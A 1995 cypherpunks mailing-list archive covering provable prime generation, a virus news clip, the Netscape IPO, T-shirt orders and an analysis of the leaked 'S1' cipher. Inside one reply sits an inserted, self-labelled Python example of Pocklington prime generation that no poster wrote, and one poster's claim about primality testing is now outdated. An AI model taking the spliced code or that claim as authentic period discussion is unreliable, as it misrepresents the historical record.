Subject: Re: How To Spot a Spook page
Message-ID: <199508090807.DAA29133@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Uh, if you look at that, that is EXACTLY identical to the majority of 
>computer geeks :-)
>

er, ah, um......

Well, then I guess we need more identifiers then, don't we?

Dave

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMChKgsVrTvyYOzAZAQH8uAP+MRbza+ttgJCOqXlgtfwI1vTcYjAWzAm0
8EK5L/83iXhYhGuZIR44YqGdwGGkSeC0lqaZDaYqQFH8W/SMcPJYyOPbAzEv/5a4
uYNW8qx/YcLwUPsr/4K6Vwd+yg4Es/sT3cxzwZdbKL8sRInN6dv32Y89pIf/FURy
mietqXnCwOY=
=Hijl
-----END PGP SIGNATURE-----
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 08:36:35 PDT
To: cypherpunks@toad.com
Subject: Re: Prime Number Gen's.
Message-ID: <199508091535.IAA28827@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There are algorithms for producing provable primes which don't take
too long.  However they do not work to prove a given probable prime
is actually prime, rather they generate a prime.  One was described
by Mihailescu Preda, <zhmhd@zh014.ubs.ubs.ch>, on sci.crypt on
December 13, 1993.  It is not clear whether this kind of algorithm is
suitable for RSA (where the primes must be kept secret) since it could
reduce the space of primes which are produced.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 9 Aug 95 05:37:43 PDT
To: cypherpunks@toad.com
Subject: Re: Dir.Byway Virus (NewsClip)
Message-ID: <199508091237.IAA14167@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




>    Subject: Dir.Byway Virus (NewsClip)
>    From: anonymous-remailer@shell.portal.com (unknown)
>    To: cypherpunks@toad.com
         ^^^^^^^^^^^^^^^^^^^^ You misspelled VIRUS-L@lehigh.edu
    
>    Burlington, Mass. Aug. 7 -- A new, hazardous computer virus is

A news story, with all *that* entails.

>    virus, dubbed "Dir.Byway," is described as a super-fast,
>    polymorphic infector affecting desktops, notebooks, and even 
>    computer networks.

So it's a polymorphic fast infector that attacks EXE and COM files.
So what's new?  File infectors are never as successful as boot sector
infectors, anyhow.

>    Dir.Byway triggers if the current DOS date is set to the year
>    1996 or above, and the day of the month is equal to the
>    month's number multiplied by two and two is added, like in
>    01-14-96 or 12-26-96.

The first date should obviously be 01-04-96, based on the description
given.  Do you trust someone who can't multiply and add to correctly
report on something technical, like computer viruses?

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 06:53:07 PDT
To: KALLISTE@delphi.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: <01HTUMY1W4UA91Y3J0@delphi.com>
Message-ID: <199508091351.JAA12331@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Was the message that this isn't "FosterPunks" unclear the first
seventy times?

KALLISTE@delphi.com writes:
> 	   Allegations Regarding Vince Foster, the NSA, and
> 		Banking Transactions Spying, Part XV
> 
> 			  by J. Orlin Grabbe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 9 Aug 95 07:14:32 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: Prime Number Gen's.
In-Reply-To: <Pine.3.89.9508082313.C4312-0100000@lia.bga.com>
Message-ID: <199508091413.KAA00112@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:
> > don't have a GNU ftp site to hand.
> > 
> > There's a function
> > 
> > 	int mpz_probab_prime_p(mpnum, SURETY)
> > 
> > which returns true if the prime passes SURETY probabilistic prime tests.
> > 
> > I think if it passes say 25 tests, then there will be less than a
> > 1/2^25 chance that it is not prime.
> > 
> > Also, on:
> > 
> > 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> > 
> 
> The proper thing to do is to then search for a number which demonstrates 
> p is prime....

  And how do you do this? I'm not aware of any deterministic primality
test which isn't at least as hard as factoring. P-1 factorial is such
a number which could demonstrate P is prime (compute the gcd, check if
they are relatively prime). Good luck computing it.
 
-Ray
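
[Added example, not written by any poster in this thread and not GMP code.]
The thread asks for "a number which demonstrates p is prime" and mentions
algorithms that generate provable primes instead of proving a given one. The
Python below does the latter with Pocklington's criterion, a standard
construction that is not necessarily the one posted to sci.crypt: each prime
n = 2*R*q + 1 is built on a smaller proven prime q > sqrt(n) and comes with a
witness a. Function names and the 20-bit trial-division base case are choices
made for this illustration.

```python
import math
import random


def is_prime_trial(n):
    """Deterministic trial division; only used for the small base prime."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return False
        f += 2
    return True


def pocklington_witness(n, q, bases=(2, 3, 5, 7, 11, 13)):
    """Given a prime q dividing n-1 with q*q > n, return a base a that proves
    n prime, or None if n is composite or no listed base settles it."""
    if (n - 1) % q != 0 or q * q <= n:
        return None
    for a in bases:
        if pow(a, n - 1, n) != 1:
            return None                  # fails Fermat's test: composite
        g = math.gcd(pow(a, (n - 1) // q, n) - 1, n)
        if g == 1:
            return a                     # every prime factor of n is 1 mod q > sqrt(n)
        if g != n:
            return None                  # g is a proper factor of n
    return None


def generate_provable_prime(bits, rng=None):
    """Return (p, chain): p has exactly `bits` bits and
    chain = [base_prime, (n1, q1, a1), ..., (p, q, a)] certifies it."""
    if bits < 8:
        raise ValueError("bits must be at least 8")
    rng = rng or random.SystemRandom()
    if bits <= 20:                       # base case, proved by trial division
        while True:
            p = rng.randrange(1 << (bits - 1), 1 << bits) | 1
            if is_prime_trial(p):
                return p, [p]
    while True:
        # q gets just over half the bits, which guarantees q*q > n below.
        q, chain = generate_provable_prime((bits + 1) // 2 + 1, rng)
        lo = ((1 << (bits - 1)) + 2 * q - 2) // (2 * q)   # smallest R: n >= 2^(bits-1)
        hi = ((1 << bits) - 2) // (2 * q)                 # largest R: n < 2^bits
        for _ in range(50 * bits):
            n = 2 * rng.randrange(lo, hi + 1) * q + 1
            a = pocklington_witness(n, q)
            if a is not None:
                return n, chain + [(n, q, a)]
        # no luck with this q (very unlikely): loop and build a fresh one


def verify_chain(chain):
    """Re-check a certificate without trusting the generator.
    Returns the proven prime, or None if any step fails."""
    q = chain[0]
    if q.bit_length() > 20 or not is_prime_trial(q):
        return None
    for n, claimed_q, a in chain[1:]:
        if claimed_q != q or (n - 1) % q != 0 or q * q <= n:
            return None
        if pow(a, n - 1, n) != 1:
            return None
        if math.gcd(pow(a, (n - 1) // q, n) - 1, n) != 1:
            return None
        q = n
    return q


if __name__ == "__main__":
    p, chain = generate_provable_prime(256)
    assert verify_chain(chain) == p
    print(p.bit_length(), "bit prime,", len(chain) - 1, "certificate steps")
```

Every prime this produces has p-1 divisible by a prime larger than sqrt(p),
so the output is drawn from a subset of all primes of that size, which is the
reduced-space concern raised in the thread for secret RSA primes.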







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Aug 95 11:13:42 PDT
To: cypherpunks@toad.com
Subject: Crypto = Competitive Advantage?
Message-ID: <199508091417.KAA17510@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Note to Mr. Bill -

I was watching CNBC this morning while reading my mail and they had a story
on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
when asked whether Microsoft couldn't just wipe them out that the most
important part of Netscape's product was that it offered end-to-end
encryption.  He said that this was important for the growth of the nets and
was something that people wanted.

DCF

"Competitive Advantage - Markets vs Politics - in a market your customers go
out of their way to give you their money, in politics the 'customers' go out
of their way to keep from giving you their money."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 9 Aug 95 08:05:20 PDT
To: cypherpunks@toad.com
Subject: Re: How To Spot a Spook page
Message-ID: <9508091505.AA23842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).
> 2> No, or *very* few, visitors (esp. kids)
> 3> Visitors are seldom the same, or almost always the same.
> 4> Doesn't talk about job/company.
> 5> Activity at 'unusual' times.
> 6> Not very 'sociable' (keep to themselves).

Isn't this a troll? It looks like the old National Enquirer 'How to tell if 
your neighbor is a space alien' list.

Peter Trei
(ptrei@acm.org)
(Claimer: I'm a former MITRE employee)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 9 Aug 95 12:00:59 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <ac4e530c13021004688c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 8/9/95, Duncan Frissell wrote:
>Note to Mr. Bill -
>
>I was watching CNBC this morning while reading my mail and they had a story
>on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
>when asked whether Microsoft couldn't just wipe them out that the most
>important part of Netscape's product was that it offered end-to-end
>encryption.  He said that this was important for the growth of the nets and
>was something that people wanted.

As long as the Netscape IPO topic has come up...

A former member of our list, Marc Andreessen, just became worth $70 million
or so in today's IPO. (IPO = Initial Public Offering, or "Internet PGP
Offering")

Personally, I think this valuation of Netscape at a few billion dollars is
way too high. They've got a leading product, which most folks have gotten
for free, and they've signed a bunch of corporate deals. But a few billion
for a brand new company?

...and who knows how many of their sudden multimillionaire developers will
now leave...?

Crypto could be the next big wave of IPOs, with "Verisign" and "RSADSI"
both rumored to be offered. Some of the digital commerce companies may be
next.

It seems that anything involving the Internet, the Web, and digital
commerce is really, really hot.

--Timothy C. May, President, Bank of the Web


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Wed, 9 Aug 95 11:21:49 PDT
To: Kelly Goen <kelly@netcom.com>
Subject: Re: Over 350 'Munitions T-shirts' Shipped
Message-ID: <199508091830.MAA02588@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Where are mine...I got the money to you via
>Mario wojo???? at SUN...
>I ordered 8 of the shirts

Sorry. I show no order for anyone named Goen, no orders from anyone named Mario, and only one order from anyone at Sun. Are you sure you ordered from me or did you order from Joel? (Who I understand has been a bit slow in filling his orders.) If you want to order from me, I have included email and USnail ordering instructions at the end of this message.

>BTW
>I am the publisher of PGP 1.0 the only person
>who will be indicted with Phil or alone for PGP
>what about MY defense fund????

I'm not in the business of setting up defense funds. If you have one, I would be happy to publicize it. Send me your story.

-----BEGIN PGP SIGNED MESSAGE-----

MUNITIONS TSHIRT ORDER INFO (That you requested)

Either cost only (UK), or 25% proceeds to Phil Zimmermann (US).

We now have 2 suppliers, one in the US (WEPIN, for US & Canadians only), 
and one in the UK (Adam Back) for the 'free world', you know places like 
Europe (with the strange exception of France), Australia, New Zealand, 
Singapore, Japan, etc, etc.

If you are a citizen of and living in the US or Canada:
===========================================================================
 US orders (25% of proceeds to the Phil Zimmermann legal defense fund):

        http://colossus.net/wepinsto/

(It's all set up for WWW forms, you can use VISA, M/C, or personal check
to buy on-line, or you can order via PGP-encrypted email.)

Tshirts are black 100% cotton Beefy-T with white printing. On the front
of the shirt are the words 'RSA encryption in perl'. Below that is a perl
script that implements the RSA algorithm for arbitrary keylengths. Below
that is a machine-readable barcode of the same perl script. On the back
of the shirt are the words 'WARNING This t-shirt is a munition' along with
the ITAR and USC references that make it a munition that is illegal to
export. You can see a mockup of the design by pointing your Web browser
to the URL http://colossus.net/wepinsto/wsft_f/wspp_f/tshirt1.html.

Here are the prices, but order through the web page if you can, all on-line, 
Tshirts only (no sweatshirts), and only in black:

   Large:    $15.95
   X-Large:  $15.95
   2X-Large: $17.95
   3X-Large: $19.95

No tax, shipping, or handling charges. Just send a message (PGP encrypted 
recommended - see my key below) to dhenson@itsnet.com with your desired 
shipping address, the quantity of each size that you want, and total amount 
of the order along with payment info. (See below, after my PGP key, for 
what info you need to include.) MAKE YOUR CHECK OR MONEY ORDER PAYABLE TO 
'ALH'. It is also a good idea to include your telephone number and email 
address in case there are questions about your order. (All this plus 
payment info can be sent via the Web page.)

You can send Visa/MasterCard info and personal check info in email or via 
the Web page order form. If you want to pay any other way, you will have to 
send your order via USnail to:

     West El Paso Information Network (Tshirt)
     6112 N. Mesa #218
     El Paso, Texas 79912

Here's my PGP public key (use to encrypt your order). Don't forget to
remove the '- ' at the beginning and the end of the block.


If you're not a US or Canadian citizen or permanent resident living in the 
US or Canada, use the UK shirt offer below.

PAYMENT INFO YOU NEED TO INCLUDE IN YOUR EMAIL ORDER:

VISA/MASTERCARD

     1) Name on the card (exactly as it is printed on the card):

     2) Card Type: (Visa/MC)

     3) Card Number:

     4) Card Expiration Date:

PERSONAL CHECK

If paying by Telecheck, please follow these instructions carefully and 
double-check all your entries for accuracy and completeness.  Please note 
that the check must be drawn on a U.S. Bank.

First, take out your checkbook and write a check (made payable to 'ALH') 
just as though you were going to mail it to us.  Don't forget to enter the 
information in your check register.  Use the check you have written as the 
source of the information we will be asking for below.

The first item of information we need is the name or names printed on the 
check.  Include all spaces, commas, periods, etc exactly as printed on the 
check. (For example, if there is a period after the initial, use it . . . 
if no period, don't put one in.)  If it is a joint account, include the 
joint name also.

   Name(s) EXACTLY as it appears on your check:
   Check Number: 
   Dollar Amount: $
   Bank Name: 
   Bank Address: 
   Bank City/State/Zip: 

Across the bottom of every check is a series of funny-looking (MICR) 
numbers. These numbers include the routing codes for the bank, your account 
number, and the check number. There are also some non-numeric symbols. Just 
leave a blank space in the number where these symbols appear. Also include 
a blank space where there is a blank space in the number. After you have 
entered the numbers from left to right, it is a good idea to double-check 
them from right to left.  (It's easier to catch mistakes this way.)

   MICR Numbers: (Double-Checked)
   Enter any comments that you would like to have appear on the check as 
      memo:

If you are NOT a citizen of and living in the US or Canada:
===========================================================================

 Free world: printed in the UK for shipping to anywhere

    http://dcs.ex.ac.uk/~aba/rsa/uk-shirt.html

 Cost only (estimated cost, if there is any change, it goes to the PZLDF 
also) If you're in the US Don's offer is going to work out cheaper.

 (If you're a foreign national living in the US or Canada you should
  order through this option as it would be illegal for Don to sell to
  you)

 My prices are (all in UKP):

 Prices inclusive of UK postage, and packing, see below for overseas 
postage

   T-shirts

       only 2 sizes available: Large (L), and Extra Large (XL),
       both the same price: 8 UKP

   Sweatshirts

       only 2 sizes available: Large (L), and Extra Large (XL),
       both the same price: 14 UKP

 Overseas postage:

   Add 0.75 UKP per shirt for Europe

   Add 1.50 UKP per shirt for US & Canada

   Add 2.00 UKP per shirt for Australia, New Zealand, South Africa or other

 I will accept payment in UK currency cheques or UK cashable money orders, 
or if you want to risk cash in the post, UK cash or US cash (you bear 
risk).

 I CAN'T take credit cards etc, as I'm just a student, and don't have  
facilities for this kind of thing.  So you'll have to use cheques/cash as 
described above.

 (The costs are estimated because it is impossible to get a firm quote
  without knowing how many to order, which I can't know until I have the
  orders, so if it works out cheaper due to higher volume than expected and
  there is any change left over, I will forward it to the Phil Zimmermann
  legal defense fund).

 My snail address is:

   Adam Back
   South Blagdon Farm
   Thorndon Cross
   OKEHAMPTON
   Devon
   UK
   EX20 4NJ

 Please make sure to include:

   - your email address in case of query
   - your snail mail address
   - details of choice of T-shirt or sweat-shirt and size (L or XL)
   - payment

Adam

Here is my PGP public key, if you feel the need to say anything financially 
related, or prefer secure email (you'll need to edit off the leading "- " 
which my PGP signing the whole mail has added, before you feed it to PGP):


Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Wed, 9 Aug 95 10:27:10 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Dir.Byway Virus (NewsClip)
In-Reply-To: <199508090639.XAA16760@jobe.shell.portal.com>
Message-ID: <9508091724.AA23965@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain



Seems like a good-press piece for a small anti-viral software
company.  Just one small pick to nit:

anonymous-remailer@shell.portal.com said:
> Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit" will 
> remove the virus from infected computers. New versions of the Toolkit 
> for DOS, Windows, OS/2, and NetWare are slated to ship in late 
> summer. S&S also plans Fall 1995 introductions of Toolkits for 
> Macintosh, SCO Unix, Windows 95, and Windows NT server and 
> workstations.

What?  Toolkit?  A virus toolkit?

Windows NT has an abstracted and object oriented design.  User mode
programs no longer have access to the hardware (i.e., you no longer
have access to the boot sector, and cannot hook an interrupt).  In
short, viruses are much less likely to function under NT, yet these
blood-sucking people can't wait to introduce software for it...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KALLISTE@delphi.com
Date: Wed, 9 Aug 95 09:30:14 PDT
To: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
Message-ID: <01HTVAYUCH6W90PB08@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
	Many people are interested in cryptology because they don't
want the NSA (among others) invading their privacy.  The Foster story
concerns the chief NSA privacy-invasion of modern times:  spying on
domestic banking transactions.  So it's relevant.
	The Grand Inquisitor role is getting a little old.  So if
you want to continue to play it, my response is:  Fuck Off.

-Orlin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 9 Aug 95 12:32:54 PDT
To: rfb@lehman.com
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <9508091859.AA16290@cfdevx1.lehman.com>
Message-ID: <199508091932.MAA22814@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
>     Date: Wed, 09 Aug 1995 10:17:30 -0400
>     From: Duncan Frissell <frissell@panix.com>
> 
>     I was watching CNBC this morning while reading my mail and they had a story
>     on the Netscape Communications IPO (ticker NSCP btw).
> 
> Apparently the opening price was doubled very shortly before the IPO
> (late yesterday afternoon) from $14 to $28.  By lunch-time (in NYC),
> shares were trading at $72.

Amazing ain't it - a moron girl at Goldman Sachs of course told me I was 
crazy and anyone who felt Netscape was going to go over the top was a moron.

I guess these corporate types are going to have to get used to the idea 
that the "net" is here to stay and a huge industry to boot. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Wed, 9 Aug 95 11:17:25 PDT
To: cypherpunks@toad.com
Subject: Re: Trouble accessing archive with Netscape
Message-ID: <199508091814.OAA11696@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199506281259.AA03051@bear-gate.bear.com>,
David Mandl <dmandl@bear.com> wrote:
>> From: shamrock@netcom.com (Lucky Green)
>> 
>> Am I the only one that has problems accessing the archives using Mac
>> Netscape 1.1N?
>
>I had the same problem.

(And Tim reports the same).

Huh.  Since I only use lynx and arena, I haven't seen this.  But I'll
take y'all's word for it.

Since I'm about to toss hypermail out the window and replace it with my
own code (that I'm working on anyway for a consulting gig -- one of
the benefits of running the archives is having a test-bed for large
archives), you can reasonably expect the problem to go away in the
not-too-distant future.

I'll probably ask for people to test the new HTML when it's ready.
- -- 
Todd Masco     | "Don't be too proud of this technological terror you've
cactus@hks.net |   constructed."        - Darth Vader   
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCj7BSoZzwIn1bdtAQEVRgF5AXaw25/1H4dfrGGuCtNhXm4wg23f9nnR
q8HOzsnbVkznKal8wtzvgblofYtjekTK
=ZC4N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 9 Aug 95 12:33:49 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Sizzling!!! Was: Crypto = Co
In-Reply-To: <ac4e530c13021004688c@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950809141541.16691A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. Bank President,

Seems? All of the Net' stocks are far outpacing my Coca-Cola shares
right now. And, my Coke stock is at all time highs. My Coke stock is
up 1150% in 10 years. Sizzling appears to be a better word for it.

Good Coke traders everywhere ARE trying to cash in on this very
fab trading pattern. It looks to me that Viacrypt would do really
well when PGP 3.0 comes out, particularly if it has a GUI interface.

And if TCMAY ever became a "pink sheet" stock, I'd stop everything
and buy some shares in it. 

Love Always,

Carol Anne

On Wed, 9 Aug 1995, Timothy C. May wrote:
> It seems that anything involving the Internet, the Web, and digital
> commerce is really, really hot.
> --Timothy C. May, President, Bank of the Web
> tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 9 Aug 95 12:01:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <199508091417.KAA17510@panix.com>
Message-ID: <9508091859.AA16290@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 09 Aug 1995 10:17:30 -0400
    From: Duncan Frissell <frissell@panix.com>

    I was watching CNBC this morning while reading my mail and they had a story
    on the Netscape Communications IPO (ticker NSCP btw).

Apparently the opening price was doubled very shortly before the IPO
(late yesterday afternoon) from $14 to $28.  By lunch-time (in NYC),
shares were trading at $72.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 9 Aug 95 12:06:09 PDT
To: cypherpunks@toad.com
Subject: PGP at work?
Message-ID: <9508091904.AA16481@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the FAQ.  Really, I've spent the last hour scanning the
distributed docs and hopping around to different web pages looking for
this info.

What constitutes ``commercial use'' of PGP?

I could swear (if I were a theist :-) that I'd seen some sort of
statement from RSADSI, PKP and/or MIT that it is ok to use PGP for
mail at work providing that the *purpose* of the mail is not
commercial.  Could someone confirm or deny this, preferably with a
reference?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Wed, 9 Aug 95 13:19:23 PDT
To: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
Message-ID: <v02130501ac4ebd418bbb@[134.84.101.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 pm 8/9/95, KALLISTE@delphi.com wrote:
>Perry,
>        Many people are interested in cryptology because they don't
>want the NSA (among others) invading their privacy.  The Foster story
>concerns the chief NSA privacy-invasion of modern times:  spying on
>domestic banking transactions.  So it's relevant.
>        The Grand Inquisitor role is getting a little old.  So if
>you want to continue to play it, my response is:  Fuck Off.
>
>-Orlin

I'm thankful that someone can occasionally (or even always) point out that the messages are getting rather far from what is considered the main topics of the list. This is a very high volume mailing list, at least three times as high as anything else I try to read. I didn't subscribe to a conspiracy buff list but it is not my intention to go out of my way to insult anyone here. But there are lists (aren't there?) for people who find such speculation interesting.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 9 Aug 95 13:23:23 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <9508092021.AA02019@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Jason Weisberger writes:
>  > Apparently the opening price was doubled very shortly before the IPO
>  > (late yesterday afternoon) from $14 to $28.  By lunch-time (in NYC),
>  > shares were trading at $72.
>
>  Amazing ain't it - a moron girl at Goldman Sachs of course told me
>  I was crazy and anyone who felt Netscape was going to go over the
>  top was a moron.

It may have "opened" at $28, but the first bid was $71 and now it's trading  
at $50something.  Not quite so spectacular as at first glance...  So unless  
you shorted it or were an insider it wasn't such a hot thing (so far).   
Quarterdeck is probably a better buy.

ob crypto:  the "top secret" source just posted looks interesting... 64-bit  
blocks, 80-bit keys, 32 rounds hmmmm....

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 16:00:53 PDT
To: cypherpunks@toad.com
Subject: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508092259.PAA10092@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I suppose the unstated implication is that this might be Skipjack.

I have looked at the program a bit and have a few observations:

There is an obvious typo in the "g" function, whose first parameter
should be 0 or 1, but which tests it for 0, 1, or 2.  This suggests an
amateur effort.  The coding style in general suggests a lack of familiarity
with C (absence of "for" loops, with equivalent "while" loops substituted).

The program appears to be based on a hardware-based description of the
algorithm, judging from comments and style.

The algorithm uses two fixed arrays F and G.  Comments indicate that F
was designed as four independent arrays F0, F1, F2, and F3.  These are
supposed to be non-linear.  Each takes 8 bits in and 8 bits out.  G is
two arrays, each 8 bits in and 1 bit out.  The comments indicate that
it is supposed to be "pseudo-linear".  G1 is the odd parity function.
G0[i] is 0 0 1 1 0 1 1 0 0 1 repeated over and over.  This is unusual
because it is period 10 (the second 5 bits are the inverse of the first
5).  I don't know whether there would be a more concise algorithmic
representation of G0.

Key size is 80 bits.  The program implements the ability to hold 5 keys
at once.  Block size is 64 bits.  The keys are expanded internally into a
large array.  I haven't looked at the key scheduling in detail.

The encrypt and decrypt block functions have fixed xor's applied to the
64 bits of input and output.  This appears to be cryptographically
useless (or at least not very useful), similar to the initial
permutation in DES.  It is curious that xor's are used here rather than
a permutation.  That may represent an attempt to design the cipher to
run well in software.

The encryption function itself is a modified Feistel type cipher, with
the blocks broken into 8 pieces and xor'd with functions involving F,
G, the key and other pieces in a reversible pattern.  The loop iterates
32 times but only two of the 8 pieces are changed each iteration so
each 8 bit piece actually gets modified only 8 times.  The pattern is:

	piece 6 modified by pieces 4, 5, 2, 3
	piece 7 modified by pieces 4, 5, 0, 1
	piece 0 modified by pieces 6, 7, 4, 5
	piece 1 modified by pieces 6, 7, 2, 3
	piece 2 modified by pieces 0, 1, 6, 7
	piece 3 modified by pieces 0, 1, 4, 5
	piece 4 modified by pieces 2, 3, 0, 1
	piece 5 modified by pieces 2, 3, 6, 7

repeated 8 times.  Decryption goes in the inverse order as is typical of
these ciphers.

The key is basically 80 bits, however there is a function S1_create_key
which pads it with 16 bits of 0 and then encrypts it with two overlapping
encryptions using the all-zeros key.  The resulting 96 bit key is then
fed as input to S1_load_key which decrypts it and checks for the 0's to
ensure validity.

I am not much of a cryptanalyst, but from what I understand the overall
security of a Feistel-type cipher like this depends a great deal on the
structure of the F (and in this case G) boxes.  I would not be at all
qualified to analyze those.  So potentially this may be a strong cipher
or it may be weak.  The actual implementation does as I remarked show
some signs of amateur programming skills.  In addition to the points
mentioned it is curious that the G arrays are initialized with a list of
256 values rather than taking advantage of the apparent regularities
noted.

Hal Finney
hfinney@shell.portal.com
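
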